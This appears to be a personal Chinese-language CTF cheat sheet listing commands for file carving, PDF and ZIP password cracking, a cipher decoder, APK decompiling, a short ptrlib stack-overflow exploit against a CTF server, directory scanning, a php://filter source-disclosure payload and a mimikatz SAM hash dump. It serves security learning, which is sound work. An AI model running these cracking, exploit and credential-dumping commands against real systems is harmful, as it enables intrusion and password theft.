解析文件
binwalk 文件名称
分解文件
foremost 文件名称
暴力破解密码
pdfcrack -f 00000000.pdf -n 4 -m 8 -c abcdefghijklmnopqrstuvwxyz
字典破解密码
pdfcrack -w rockyou.txt -f 00000000.pdf
切换 登录 root
sudo su
打开 图像界面
kex --win -s
js解码
对于密文的每个字母,其在字母表中的位置是原始字母的位置乘以4并移动15个字符 字母表上的移动是循环的,所以移动1的“z”是“_ ”,移动1的“_”是“a” aplhabet由字母“a”到“z”和符号“_”组成 字母“a”的位置为0,符号“_”的位置为26(在“z”之后)
let alphabet = "abcdefghijklmnopqrstuvwxyz_";
let pd = 'ifpmluglesecdlqp_rclfrseljpkq'
let counts = alphabet.length
let ciphers = {}
for (let i = 0; i< alphabet.length; i++) {
let pos = (i* 4 + 15) % counts
ciphers[alphabet[pos]] = i
}
let r = ""
for(let s in pd){
let pos = ciphers[pd[s]]
r += alphabet[pos]
}
console.log(r)
运行python 文件
python3 a.py
反编译文件
apktool d -f zlbh.apk -o apktool
新建 文件 a.py
touch a.py
写入 "a.py" 到 a.py 文件中
echo "a.py" >> a.py
解析文件
objdump 文件 -D
安装插件
apt-get install 插件名称
电话号码 音频文件分析网站
解码网站
https://cryptii.com/pipes/vigenere-cipher
Vigenère cipher: Encrypt and decrypt online - cryptii
CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码
Playfair Cipher (online tool) | Boxentriq
解析文件 server 找打 win 方法地址
objdump -d server | grep win
简单的利用栈溢出漏洞的攻击脚本
from ptrlib import *
sock = Socket("thekidofarcrania.com", 4902)
payload = '111111111111111111111111111111111111111111111111111111111111' + '\x86\x85\x04\x08'
sock.sendlineafter("Input some text:", payload)
while True:
print(sock.recvline().decode("utf-8"))
zip2john.exe <要转的文件> > 转成的文件.hash
john --wordlist=密码本文件.txt 要解密的文件.hash
扫描网站
python dirsearch.py -u http://114.67.175.224:11094/
php 伪协议 获取文件 index.php
php://filter/read=convert.base64-encode/resource=index.php
mimikatz 简单取证
lsadump::sam /sam:SAM /system:SYSTEM